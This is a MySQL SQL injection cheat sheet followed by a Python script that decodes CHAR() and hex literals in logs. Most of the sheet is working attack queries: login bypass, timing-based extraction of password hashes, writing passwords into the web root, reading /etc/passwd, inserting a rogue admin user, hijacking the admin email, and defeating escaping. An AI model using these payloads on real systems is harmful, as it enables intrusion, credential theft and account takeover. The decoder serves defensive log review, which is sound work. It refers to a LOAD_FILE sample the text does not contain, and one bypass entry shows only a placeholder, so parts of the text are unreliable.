    SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
    SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

    SHOW TABLES
    SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
    SELECT VERSION()
    SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
    SELECT host,user,db from mysql.db
    SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;
    Blind injection vectors.
    Operators

    SELECT 1 && 1;
    SELECT 1 || 1;
    SELECT 1 XOR 0;
    Evaluate

    all render TRUE or 1.
    SELECT 0.1 <= 2; SELECT 2 >= 2;
    SELECT ISNULL(1/0);
    Math

    SELECT FLOOR(7 + (RAND() * 5));
    SELECT ROUND(23.298, -1);
    Misc

    SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
    SELECT MD5('abc');
    Benchmark

    SELECT BENCHMARK(10000000,ENCODE('abc','123'));
    this takes around 5 sec on a localhost

    SELECT BENCHMARK(1000000,MD5(CHAR(116)))
    this takes around 7 sec on a localhost

    SELECT BENCHMARK(10000000,MD5(CHAR(116)))
    this takes around 70 sec on a localhost
    Using the timeout to check if user exists

    SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

    Beware of the N rounds: add an extra zero and it could stall or crash your browser!
    Gathering info
    Table mapping

    SELECT COUNT(*) FROM tablename
    Field mapping

    SELECT * FROM tablename WHERE user LIKE "%root%"
    SELECT * FROM tablename WHERE user LIKE "%"
    SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
    SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
    User mapping

    SELECT * FROM tablename WHERE email = 'user@site.com';
    SELECT * FROM tablename WHERE user LIKE "%root%"
    SELECT * FROM tablename WHERE user = 'username'
    Advanced SQL vectors
    Writing info into files

    SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
    '/path/location/on/server/www/passes.txt'
    Writing info into files without single quotes: (example)

    SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

    Note: You must specify a new file (it may not already exist) and give the correct pathname!
    The CHAR() quoteless function

    SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

    SELECT * FROM login WHERE user = CHAR(39,97,39)
    Extracting hashes

    SELECT user FROM login WHERE user = 'root'
    UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
    BENCHMARK(1000000,MD5('x')),null) FROM login
    example:

    SELECT user FROM login WHERE user = 'admin'
    UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
    BENCHMARK(1000000,MD5('x')),null) FROM login

    SELECT user FROM login WHERE user = 'admin'
    UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
    BENCHMARK(1000000,MD5('x')),null) FROM login
    explaining: (passwordfield,startcharacter,selectlength)

    is like: (password,1,2) this selects: 'ab'
    is like: (password,1,3) this selects: 'abc'
    is like: (password,1,4) this selects: 'abcd'

    A quoteless example:

    SELECT user FROM login WHERE user =
    CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
    UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
    BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

    Possible chars: 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122
    Misc
    Insert a new user into DB

    INSERT INTO login SET user = 'r00t', pass = 'abc'
    Retrieve /etc/passwd file, put it into a field and insert a new user

    load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'

    Then login!
    Write the DB user away into tmp

    SELECT host,user,password FROM user into outfile '/tmp/passwd';
    Change admin e-mail, for "forgot login retrieval."

    UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';
    Bypassing PHP functions

    (MySQL 4.1.x before 4.1.20 and 5.0.x)
    Bypassing addslashes() with GBK encoding

    WHERE x = 0xbf27admin 0xbf27
    Bypassing mysql_real_escape_string() with BIG5 or GBK

    "injection string"
    に関する追加情報:

    the above chars are Chinese Big5
    Advanced Vectors
    Using a HEX-encoded query to bypass escaping.
    Normal:

    SELECT * FROM login WHERE user = 'root'
    Bypass:

    SELECT * FROM login WHERE user = 0x726F6F74
    Inserting a new user in SQL.
    Normal:

    insert into login set user = 'root', pass = 'root'
    Bypass:

    insert into login set user = 0x726F6F74, pass = 0x726F6F74
    How to determine the HEX value for injection.

    SELECT HEX('root');
    gives you:

    726F6F74
    then add:

    0x
    before it.
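Going the other way is what a log or WAF reviewer needs: the quoteless CHAR() forms above, the CONCAT() of CHAR() calls, and the 0x hex literals from this section (and the LOAD_FILE(0x...) sample earlier) all hide the string the query really compared against. The decoder below is an added example, not part of the cheat sheet; the sample inputs are queries from this page and the function names are mine.

```python
"""Decode the quoteless literal forms shown above (CHAR(n,...) lists, CONCAT()
of CHAR() calls and 0x hex literals) back to the text they evaluate to, so a
reviewer reading a log or WAF alert sees what the query really compared
against. Added example, not from the cheat sheet; inputs come from this page."""
import re

CHAR_CALL = re.compile(r"CHAR\(\s*([0-9\s,]+?)\s*\)", re.IGNORECASE)
CONCAT_OF_CHARS = re.compile(
    r"CONCAT\(\s*((?:CHAR\([0-9\s,]*\)\s*,?\s*)+)\)", re.IGNORECASE)
HEX_LITERAL = re.compile(r"\b0x([0-9A-Fa-f]+)\b")


def _chars(arglist):
    """CHAR(39,97,39) takes integer codes; join them into one string."""
    return "".join(chr(int(n)) for n in arglist.split(","))


def _decode_hex(match):
    """0x726F6F74 in a string context is the bytes 'root'. Leave the literal
    alone when it is odd-length or does not decode to printable text, since
    it may be a genuine number or binary data."""
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)
    text = bytes.fromhex(digits).decode("latin-1")
    if not text.isprintable():
        return match.group(0)
    return "'" + text + "'"


def decode_quoteless(sql):
    """Rewrite CONCAT(CHAR(..),..), bare CHAR(..) and 0x.. literals in place."""
    sql = CONCAT_OF_CHARS.sub(
        lambda m: "".join(_chars(a) for a in CHAR_CALL.findall(m.group(1))), sql)
    sql = CHAR_CALL.sub(lambda m: _chars(m.group(1)), sql)
    return HEX_LITERAL.sub(_decode_hex, sql)


if __name__ == "__main__":
    for q in (
        "SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),"
        "CHAR(109),CHAR(105),CHAR(110),CHAR( 39))",
        "SELECT * FROM login WHERE user = CHAR(39,97,39)",
        "SELECT * FROM login WHERE user = 0x726F6F74",
        "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
    ):
        print(decode_quoteless(q))
```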